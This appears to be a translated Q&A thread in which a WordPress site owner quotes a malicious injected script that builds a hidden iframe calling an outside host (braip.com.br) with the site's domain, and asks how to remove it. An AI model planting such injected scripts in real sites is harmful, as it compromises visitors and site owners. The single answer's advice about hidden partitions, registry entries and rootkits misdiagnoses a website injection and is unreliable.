Wordpress中的恶意脚本

Malicious script in Wordpress

本文关键字:脚本 恶意 Wordpress      更新时间:2023-11-23

你好,我的网站上有一个恶意脚本,我在任何地方都找不到!

我检查了检查员,它返回了这个:

<div id="menu-bar" style="position: fixed; width: 50px; transition: all 300ms ease; height: 100%; top: 0px; right: -50px;"><div id="fechar_aba"></div>
<div id="abrir_aba"></div>
<div class="handle"></div>
<script type="text/javascript">
    var relatedUrl = document.domain;
    var protocol = window.location.protocol;

    var idadv = document.createElement("iframe");
    with(idadv){
        id = "idadv";
        src = protocol+"//braip.com.br/wp-feed/2016/gondran/top10.php?modelo=2016&user=baixarfilme&url="+relatedUrl;
        scrolling = "no";
    }   
    document.getElementById("menu-bar").appendChild(idadv);
</script>
<script type="text/javascript"> 
    $("#menu-bar").slideReveal({
      trigger: $(".handle"),
      push: false,
      position: "right",
      width: 50,
      show: function(slider, trigger){
        $('#menu-bar').css({"-webkit-box-shadow":"-1px 1px 3px 0px rgba(50, 50, 50, 0.3)","box-shadow":"-1px 1px 3px 0px rgba(50, 50, 50, 0.3)"});
      },
      hidden: function(slider, trigger){
        $('#menu-bar').css({"-webkit-box-shadow":"none","box-shadow":"none"});
      },
    });
</script><iframe id="idadv" src="https://braip.com.br/wp-feed/2016/gondran/top10.php?modelo=2016&amp;user=baixarfilme&amp;url=www.websiteladies.com" scrolling="no"></iframe></div>

它位于我的wordpress的"菜单栏"中,但我在任何地方都找不到任何东西!因此,我的网站的SSL证书显示我的网站对我的客户不安全!我简直不敢相信!

以下是URL:http://www.websiteladies.com

有什么帮助吗?

我自己也遇到过这个问题,可能需要几个小时才能解决。
它将采用JavaScript、jQuery格式或VBS格式,至少部分是这样。它可能在HDD或外部USB的顶端创建了自己的分区,所以请检查您的分区

它会将自己的一部分附加到注册表中,这样它就知道你何时搜索它,并且只要你在线,它就可以自我修复。它可以作为一个根工具包开始,将自己附加到文本或照片文件中

请尝试下载Spybot SD,然后脱机安装并运行该程序。如果病毒创建了它自己的分区,你必须找到它,并对该分区进行完全擦除,然后将其设置为之前分区的扩展。快速"快速清理"不起作用,因为它只清理扇区标记

据我所知,没有任何防病毒或spybot跟踪器会在隐藏分区中查找,但他们可以清理注册表并找到隐藏的rootkit
试着记住您最近下载和安装的内容
检查已插入的USB拇指驱动器。
我建议你保持离线状态,直到你确信病毒的所有成分都消失了。我有一个在防病毒程序中隐藏了一些组件

相关文章: